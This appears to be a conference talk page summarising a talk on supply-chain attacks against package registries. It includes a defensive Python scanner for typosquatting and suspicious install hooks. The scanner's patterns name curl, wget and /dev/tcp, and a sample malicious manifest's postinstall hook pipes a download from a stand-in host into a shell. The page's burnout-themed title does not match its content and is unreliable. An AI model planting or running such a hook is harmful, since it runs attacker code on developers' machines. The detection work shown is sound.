Slaying the Dragons: A Security Professional's Guide to Burnout and Resilience
Kirill Boychenko
BSidesSF 2025 — Here Be Dragons · Day 2 · Main
Modern software applications are 70–90% open-source by composition, which makes package ecosystems an irresistible attack surface. Kirill Boychenko, senior threat intelligence analyst at Socket, walked through real malicious campaigns targeting npm, PyPI, Go, Java/Maven, and RubyGems, showing how attackers combine typosquatting, obfuscation, AI-assisted code generation, multi-stage payloads, and legitimate services such as Gmail and Discord to compromise developers and drain crypto wallets. The defense has to be automated, behavioral scanning at scale: manual review of millions of packages is not a viable option.
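To make the "automated scanning at scale" point concrete, here is a small added example (not code from the talk, from Socket, or from any real scanner) of the two cheapest checks such a pipeline runs on every published package: a name-similarity check against a list of popular packages (typosquatting) and a scan of npm install hooks for network, exec and base64-blob primitives that a benign install script rarely needs. The popular-package list, the manifests and the `example.invalid` URL are all constructed for the example.

```python
import re

# Constructed, deliberately short list of "popular" package names. A real scanner
# would derive this from download counts across the registry, not hard-code it.
POPULAR = ["lodash", "express", "react", "axios", "chalk", "requests", "numpy"]

# Primitives that are unusual in a legitimate preinstall/install/postinstall hook.
SUSPICIOUS_CMD = re.compile(
    r"curl|wget|base64|eval\(|child_process|\.exec\(|powershell|/dev/tcp", re.I
)
# A long base64-looking literal is a common way to hide a second-stage payload.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance (insert/delete/substitute, cost 1 each)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, popular=POPULAR, max_distance: int = 2):
    """Popular packages whose name is within max_distance edits of `name`.
    An exact match is the popular package itself and is never flagged."""
    if name in popular:
        return []
    return [p for p in popular if edit_distance(name, p) <= max_distance]


def suspicious_install_hooks(manifest: dict):
    """Return (hook, command) pairs for install hooks that run suspicious primitives."""
    scripts = manifest.get("scripts", {})
    hits = []
    for hook in ("preinstall", "install", "postinstall"):
        cmd = scripts.get(hook)
        if cmd and (SUSPICIOUS_CMD.search(cmd) or BASE64_BLOB.search(cmd)):
            hits.append((hook, cmd))
    return hits


def assess(manifest: dict):
    """Combine both checks into a list of human-readable findings for one package."""
    findings = []
    name = manifest.get("name", "")
    for target in typosquat_candidates(name):
        findings.append(f"name '{name}' is within 2 edits of popular package '{target}'")
    for hook, cmd in suspicious_install_hooks(manifest):
        findings.append(f"{hook} hook runs a network/exec primitive: {cmd}")
    return findings


# Constructed sample manifests (package.json contents), not real packages.
BENIGN = {"name": "axios", "version": "1.0.0", "scripts": {"test": "jest"}}
SQUAT = {
    "name": "lodahs",  # transposed letters of a popular package
    "version": "4.17.21",
    "scripts": {
        "postinstall": "node -e \"require('child_process')"
        ".exec('curl -s http://example.invalid/stage2 | sh')\""
    },
}

if __name__ == "__main__":
    for m in (BENIGN, SQUAT):
        print(m["name"], assess(m) or "no findings")
```

Both checks are cheap enough to run on every version of every package as it is published, which is the property the talk's thesis needs. They are also deliberately shallow: edit distance alone produces false positives for short names, and a string regex over install scripts says nothing about what the package's own JavaScript does at require time, so a production pipeline layers behavioral analysis of the actual code on top of these triage signals.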
AI review
Boychenko brings receipts: real campaigns, named threat actors, specific technical techniques across five ecosystems, and a concrete answer to the 'what do defenders actually do' question. The Ethereum smart contract C2 and the ChatGPT typosquatting automation are legitimately novel operational details that elevate this above the standard supply chain threat overview.